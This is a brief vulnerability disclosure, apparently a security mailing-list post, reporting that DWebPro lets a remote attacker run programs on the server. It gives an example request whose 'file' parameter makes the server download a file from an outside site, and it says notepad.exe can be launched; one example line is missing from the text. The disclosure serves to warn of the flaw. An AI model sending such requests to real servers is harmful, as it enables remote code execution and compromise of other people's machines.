1 The last version of DWebPro allows an invader to execute any program. Just hit this at your browser:
5 And the notepad.exe will open a txt file that calls hi at C:\ server’s side.
7 If you try this: http://127.0.0.1:8080/dwebpro/start?file=http://www.somesite.com.br/somefile.exe will open a browser
at server side and download the file.
9 It’s really dangerous.
11 I tested this at last version but may work at older versions as well.
13 Best Regards,
15 Rafael Sousa
DWebPro command injection